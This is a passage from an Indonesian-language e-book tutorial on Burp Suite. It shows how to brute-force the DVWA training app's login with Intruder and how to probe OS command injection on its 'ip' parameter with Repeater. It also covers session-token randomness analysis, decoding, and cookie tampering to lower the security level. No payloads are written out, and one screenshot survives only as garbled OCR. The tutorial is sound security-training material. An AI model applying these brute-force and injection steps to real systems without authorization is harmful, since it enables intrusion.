force pada bagian Options. 
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Untuk memulai melakukan bruteforce maka kita cukup memilih 
menu intruder dan memilih start attack seperti pada gambar 
berikut, 
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Gambar memulai proses bruteforce 

Salah satu hal yang menarik adalah menentukan password 
yang benar, dikarenakan intruder ini memang kegunaannya un- 
tuk melakukan automatisasi request dengan modifikasi, maka 
untuk menentukan mana password yang benar dan salah salah 
satu yang bisa kita pergunakan adalah dengan membanding- 



kan content-length, dan hal ini akan lebih mudah jika password 
yang salah menghasilkan halaman yang sama (length sama), 
sedangkan apabila password yang salah menghasilkan 
content-length yang berbeda (dalam hal ini menampilkan user- 
name kembali saat gagal login) maka anda perlu mengkonfigu- 
rasikan intruder (tab options) untuk mempermudah menemukan 
password yang benar. 
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Untuk DVWA ini kita berhasil melakukan bruteforce dengan in- 
truder dan mendapatkan username admin dan password seba- 
gai password, salah satu kelebihan lainnya kita tidak perlu 
mengkonfigurasikan cookie (seperti jika kita mempergunakan 
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hydra saat membruteforce login aplikasi dvwa) atau variable 
lainnya yang diperlukan untuk login. 

1 .4 Repeater 

Perangkat selanjutnya adalah Repeater, yang merupakan per- 
angkat sederhana untuk secara manual melakukan modifikasi 
(manipulasi) dan menjalankan single HTTP requests dan se- 
cara langsung mendapatkan response dari aplikasi. 

Untuk memanfaatkan repeater, sebagaimana penggunaan per- 
angkat lainnya, kita cuma perlu melakukan klik kanan dan men- 
girim request (Single) ke repeater, untuk kemudian dimodifikasi 
dan di kirimkan secara tersendiri. 

Untuk celah keamanan yang memungkinkan kita melakukan 
eksploitasi terkait hal ini adalah celah OS Command Injection, 
dan celah ini terdapat pada aplikasi DVWA, seperti pad a gam- 
bar berikut ini: 




Gambar request yang akan kita manipulasi secara terpisah dengan repeater 

Dan celah keamana yang akan kita eksploitasi adalah pada ha- 
laman /vulnerabilities/exec/index. php pada variable ip seperti 
pada gambar berikut ini, 
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Gambar eksploitasi celah keamanan OS Command Injection dengan repeater 

Selanjutnya adalah kita tinggal menggonta-ganti request yang 
ada khususnya pada variable ip, dan hal ini akan mempermu- 
dah dan memberi banyak keleluasaan bagi kita dalam proses 
penetration testing, dibandingkan mempergunakan browser un- 
tuk tiap request. 




1.5 Sequencer 



Perangkat ke-5 adalah sequencer, perangkat ini bermanfaat un- 
tuk melakukan proses analisa kualitas tingkat kerandoman dari 
beberapa sample data, sebagai contoh memeriksa session to- 
kens dari suatu aplikasi dsb. Sebagai contoh kita akan memeri- 
kas cookies dari aplikasi DVWA ini 
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Gambar pengiriman request ke sequencer 



Kemudian, token yang akan kita analisa adalah PHPSESSID 
seperti pad agambar berikut ini, 




Gambar pemilihan lokasi token pada response yang akan dianalisa. 

Kemudian kita tinggal menjalankan Sequencer dengan menggu- 
nakan button Start Live Capture, kemudian akan tampil hala- 
man hasil analisa yang menunjukkan bahwa hasil tingkat keran- 
doman untuk token tersebut adalah excellent, seperti pada gam- 
bar berikut, 
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Gambar hasil analisa tingkat kerandoman dari token yang dipilih 



1 .6 Decoder 



Perangkat selanjutnya adalah Decoder, perangkat ini sangat 
bermanfaat untuk melakukan decode terhadap berbagai jenis 
encode yang umum dipergunakan seperti URL, HTML, Base64, 
ASCII hex, Hex, Octal, Binary, dan GZIP serta juga mendukung 
encoding dengan tipe-tipe diatas juga. 

Selain itu perangkat decoder ini juga memiliki dukungan untuk 
melakukan Hashing dengan dukungan beberapa algoritma 
hash yang sudah umum, seperti: md5, md3, SHA, SHA-256, 
SHA-384, SHA-512 
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Gambar Penggunaan Decoder 
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1.7 Comparer 



Burp comparer adalah perangkat yang berfungsi untuk melaku- 
kan perbandingan, seperti aplikasi diff pada unix, tetapi dalam 
hal ini yang dibandingkan adalah antara HTTP request atau 
antara HTTP Response. Untuk mengirim ke comparer dapat 
melakukan click kanan item yang akan di compare kemudian 
dipilih request atau response-nya seperti pada gambar berikut 
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Gambar Mengirimkan item ke Comparer 



Sebagai contoh pemanfaatan Comparer adalah kita melakukan 
perbandingan antara login dengan security level low dan login 



dengan security level high pada aplikasi DVWA, seperti pada 

gambar berikut, 




Gambar melakukan compare 2 buah request 

Dari hasil perbandingan diatas kita mengetahui dan dapat mela- 
kukan modifikasi cookie untuk membuat security level kita low 
tanpa perlu melakukan set security pada aplikasi DVWA, 
seperti yang kita lakukan sebelumnya pada bagian proxy. 
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1.8 Scanner & 1.9 Extender (Pro-Only) 



Perangkat selanjutnya yang terdapat pada Burp suite adalah 
Burp Scanner dan Burp Extender. Kedua perangkat ini hanya 
tersedia pada Burp dengan versi Pro, dan tidak akan di bahas 
secara mendetail pada e-book ini. 

Sedang untuk penggunaan Scanner kita tinggal melakukan klik- 
kanan dan memilih mode aktif atau pasif, tetapi sebaiknya kita 
mendefinisikan Scope terlebih dahulu serta melakukan crawl- 
ing web aplikasi dengan Spider. 
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Gambar Penggunaan Scanner 

Dan hasil dari penggunaan Burp Scanner akan terdapat pada 
tab scanner, seperti contoh berikut ini adalah melakukan scan- 
ning terhadap aplikasi dvwa. 




Gambar hasil penggunaan Burp Scanner untuk aplikasi dvwa 

Dari hasil ujicoba tingkat keberhasilan burp dalam mendeteksi 
celah keamanan relatif cukup baik, burp juga meminimalisir ha- 
sil false positive, selain itu metode scanning yang dilakukan 
burp juga memberikan tingkat lebih dalah berhadapan dengan 
perangkat keamanan web seperti IDS, IPS dan Web Applica- 
tion Firewall. 
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Gambar validasi salah satu celah keamanan yang ditemukan Burp Scanner 

Burp Extender adalah salah satu fitur yang memungkinkan 
pengguna dan pengembang untuk mengembangkan penggu- 
naan dan fungsi dari Burp Suite, sebagai contoh adalah salah 
satu extender sqlmap untuk Burp Suite yang di buat dan dikem- 
bangkan oleh Daniel Garcia 



900 Burp S 


uite Professional vl S. 




Intruder ' Repeater 
Target 


Sequencer Decoc 


Prow, 


Sit* map '-.< ; . 





http ,'^1 27.0.0.1 
9 hmp:/7192.i*« i ™* 

I I HCtp //192,16t.l.207/ 



□ alHH* Removt from scope 
♦ r dvwa 



f * I 



Spider thij host 
Actively scan this host 
Passively 



f irr Passrvery scan \h 



Gambar SQLMap Extender untuk Burp Suite 
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